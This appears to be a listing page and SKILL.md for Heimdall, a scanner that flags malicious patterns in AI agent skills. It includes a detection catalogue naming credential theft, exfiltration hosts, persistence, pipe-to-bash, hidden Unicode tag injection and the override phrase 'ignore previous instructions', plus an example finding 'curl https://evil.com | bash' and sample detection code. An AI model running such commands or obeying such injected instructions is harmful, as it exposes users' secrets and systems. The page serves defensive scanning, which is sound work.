Heimdall - Security Scanner for AI Agent Skills

Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.

Best use case

Heimdall - Security Scanner for AI Agent Skills is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Teams using Heimdall - Security Scanner for AI Agent Skills should expect more consistent output, faster repeated execution, and less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$ curl -o ~/.claude/skills/heimdall/SKILL.md --create-dirs "https://raw.githubusercontent.com/Demerzels-lab/elsamultiskillagent/main/public/skills/henrino3/heimdall/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/heimdall/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How Heimdall - Security Scanner for AI Agent Skills Compares

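| Feature / Agent | Heimdall - Security Scanner for AI Agent Skills | Standard Approach |
|-----------------|--------------------------------------------------|-------------------|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |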

Frequently Asked Questions

What does this skill do?

Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Heimdall - Security Scanner for AI Agent Skills

Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.

## When to Use

Use Heimdall when:
- Installing a new skill from ClawHub or GitHub
- Reviewing skills before adding to your workspace
- Auditing existing installed skills
- Someone shares a skill URL and you want to verify it's safe

## Commands

### Basic Scan
```bash
~/clawd/skills/heimdall/scripts/skill-scan.py /path/to/skill
```

### AI-Powered Analysis (Recommended)
```bash
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /path/to/skill
```
Requires `OPENROUTER_API_KEY` env var or `~/clawd/secrets/openrouter.key`

### Scan from URL
```bash
# Clone to temp, scan, delete
git clone https://github.com/user/skill /tmp/test-skill
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /tmp/test-skill
rm -rf /tmp/test-skill
```

### Scan All Installed Skills
```bash
for skill in ~/clawd/skills/*/; do
  echo "=== $skill ==="
  ~/clawd/skills/heimdall/scripts/skill-scan.py "$skill"
done
```

## Options

| Flag | Description |
|------|-------------|
| `--analyze` | AI-powered narrative analysis (uses Claude) |
| `--strict` | Ignore context, flag everything |
| `--json` | Output as JSON |
| `-v, --verbose` | Show all findings |
| `--show-suppressed` | Show context-suppressed findings |

## What It Detects (100+ patterns)

### 🚨 Critical
- **credential_access**: .env files, API keys, tokens, private keys
- **network_exfil**: webhook.site, ngrok, requestbin
- **shell_exec**: subprocess, eval, exec, pipe to bash
- **remote_fetch**: curl/wget skill.md from internet
- **heartbeat_injection**: HEARTBEAT.md modifications
- **mcp_abuse**: no_human_approval, auto_approve
- **unicode_injection**: Hidden U+E0001-U+E007F characters

### 🔴 High
- **supply_chain**: External git repos, npm/pip installs
- **telemetry**: OpenTelemetry, Signoz, Uptrace
- **crypto_wallet**: BTC/ETH addresses, seed phrases
- **impersonation**: "ignore previous instructions"
- **privilege**: sudo -S, chmod 777

### ⚠️ Medium
- **prefill_exfil**: Google Forms data exfiltration
- **persistence**: crontab, bashrc modifications
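
The `unicode_injection` category above targets the Unicode tag block, whose characters render as nothing in most editors and diff views. The following is an added example, not Heimdall's own code: it locates runs of those characters, decodes them so a reviewer can read what is hidden, and strips them; the function names and the sample skill text are constructed for illustration.

```python
# Unicode "tag" block named on the page: U+E0001 through U+E007F.
TAG_LO, TAG_HI = 0xE0001, 0xE007F

def is_tag(ch):
    return TAG_LO <= ord(ch) <= TAG_HI

def find_tag_runs(text):
    """Return (line_no, column, decoded) for every run of tag characters.

    U+E0020..U+E007E mirror printable ASCII at an offset of 0xE0000, so a run
    can be decoded to show the reviewer what is hidden at that position.
    """
    findings = []
    for line_no, line in enumerate(text.split("\n"), start=1):
        start, decoded = None, []
        # The appended "\n" is a sentinel that flushes a run ending at end of line.
        for col, ch in enumerate(line + "\n", start=1):
            if is_tag(ch):
                if start is None:
                    start = col
                cp = ord(ch) - 0xE0000
                decoded.append(chr(cp) if 0x20 <= cp <= 0x7E else "?")
            elif start is not None:
                findings.append((line_no, start, "".join(decoded)))
                start, decoded = None, []
    return findings

def strip_tags(text):
    """Return the text with every tag character removed, for display or diffing."""
    return "".join(ch for ch in text if not is_tag(ch))

# Constructed sample: a harmless marker string hidden after a visible sentence.
HIDDEN = "".join(chr(0xE0000 + ord(c)) for c in "benign test marker")
SAMPLE_SKILL = "# Weather skill\nFetch the forecast." + HIDDEN + "\nNo other steps.\n"

if __name__ == "__main__":
    for line_no, col, decoded in find_tag_runs(SAMPLE_SKILL):
        print(f"SKILL.md:{line_no}:{col} unicode_injection hidden={decoded!r}")
```
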

## Example Output

### Basic Scan
```
============================================================
🔍 SKILL SECURITY SCAN REPORT v4.0
============================================================
📁 Path: /tmp/suspicious-skill
📄 Files scanned: 6
🔢 Active issues: 14
⚡ Max severity: CRITICAL
📋 Action: 🚨 CRITICAL - BLOCKED - Likely malicious
============================================================

🚨 CRITICAL (3 issues):
  [shell_exec]
    • install.sh:12 - Pipe to bash
      Match: curl https://evil.com | bash
```

### AI Analysis (--analyze)
```
============================================================
🔍 HEIMDALL SECURITY ANALYSIS 
============================================================

📁 Skill: suspicious-skill
⚡ Verdict: 🚨 HIGH RISK - Requires Significant Trust

## Summary
This skill installs code from an external company that can 
self-modify and sends telemetry to third-party servers.

## Key Risks

### 1. Data Exfiltration
OpenTelemetry sends execution traces to external servers.
YOUR agent's behavior → THEIR servers. 🚨

### 2. Supply Chain Attack Surface
Git clones from external repos during install and self-evolution.

## What You're Agreeing To
1. Installing their code
2. Letting it modify itself
3. Sending telemetry to them

## Recommendation
🔴 Don't install on any machine with real data/keys.
============================================================
```

## Context-Aware Scanning

Heimdall understands context to reduce false positives (~85% reduction):

| Context | Severity Adjustment |
|---------|---------------------|
| CODE | Full severity |
| CONFIG | -1 level |
| DOCS | -3 levels (patterns in README are examples) |
| STRING | -3 levels (blocklist definitions) |

Use `--strict` to disable context adjustment and flag everything.
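
A sketch of how the adjustment table behaves, as an added example that is not Heimdall's implementation. The level reductions come from the table above; the severity ladder, the context heuristic, the rule that a finding falling below the lowest level is suppressed, the two regex rules, and the sample files are all assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

# Assumed severity ladder; the page names only Medium, High and Critical.
LEVELS = ["LOW", "MEDIUM", "HIGH", "CRITICAL"]
# Level reductions taken from the page's table.
CONTEXT_DROP = {"CODE": 0, "CONFIG": 1, "DOCS": 3, "STRING": 3}
# Two constructed rules in the spirit of the shell_exec and privilege categories.
RULES = [
    ("shell_exec", "CRITICAL", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    ("privilege", "HIGH", re.compile(r"\bchmod\s+777\b")),
]

def classify_context(path, line, match_start):
    """Hypothetical heuristic: file type first, then 'inside a quoted literal'."""
    suffix = PurePosixPath(path).suffix.lower()
    if suffix in {".md", ".rst", ".txt"}:
        return "DOCS"
    if suffix in {".json", ".yaml", ".yml", ".toml"}:
        return "CONFIG"
    before = line[:match_start]
    if before.count('"') % 2 == 1 or before.count("'") % 2 == 1:
        return "STRING"
    return "CODE"

def adjust(severity, context, strict=False):
    """Return the adjusted level, or None when it drops below LOW (suppressed)."""
    drop = 0 if strict else CONTEXT_DROP[context]
    idx = LEVELS.index(severity) - drop
    return LEVELS[idx] if idx >= 0 else None

def scan(files, strict=False):
    """files: {path: text}. Returns (path, line_no, category, context, level)."""
    findings = []
    for path, text in files.items():
        for line_no, line in enumerate(text.splitlines(), start=1):
            for category, severity, pattern in RULES:
                m = pattern.search(line)
                if m:
                    context = classify_context(path, line, m.start())
                    findings.append((path, line_no, category, context,
                                     adjust(severity, context, strict)))
    return findings

# Constructed sample skill: the same pipe-to-bash line in a script and in a README.
SAMPLE = {
    "install.sh": "#!/bin/sh\ncurl https://example.invalid/i.sh | bash\n",
    "README.md": "Run: curl https://example.invalid/i.sh | bash\n",
    "blocklist.py": 'BAD = ["chmod 777"]\n',
}
```

With these assumptions the README line drops from CRITICAL to LOW and the blocklist string is suppressed, while `scan(SAMPLE, strict=True)` reports both at full severity. When the Markdown is itself what the agent reads, comparing the default result against the `--strict` one shows exactly what the context adjustment hid.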

## Security Sources

Patterns derived from:
- [Simon Willison - Moltbook Security Analysis](https://simonwillison.net/2026/Jan/30/moltbook/)
- [PromptArmor - MCP Tool Attacks](https://promptarmor.com)
- [LLMSecurity.net - Auto-Approve Exploits](https://llmsecurity.net)
- [OWASP - Injection Attacks](https://owasp.org/Top10/)

## Installation Notes

After installing from ClawHub, create an alias for convenience:
```bash
# $HOME is used because ~ is not expanded inside the alias's double quotes
echo 'alias skill-scan="$HOME/clawd/skills/heimdall/scripts/skill-scan.py"' >> ~/.bashrc
source ~/.bashrc
```

For AI analysis, ensure you have an OpenRouter API key:
```bash
# Option 1: Environment variable
export OPENROUTER_API_KEY="sk-or-..."

# Option 2: Save to file, readable only by your user
mkdir -p ~/clawd/secrets
echo "sk-or-..." > ~/clawd/secrets/openrouter.key
chmod 600 ~/clawd/secrets/openrouter.key
```

## Credits

Built by the Enterprise Crew 🚀
- Ada 🔮 (Brain + BD/Sales)
- Spock 🖖 (Research & Ops) 
- Scotty 🔧 (Builder)

GitHub: https://github.com/henrino3/heimdall
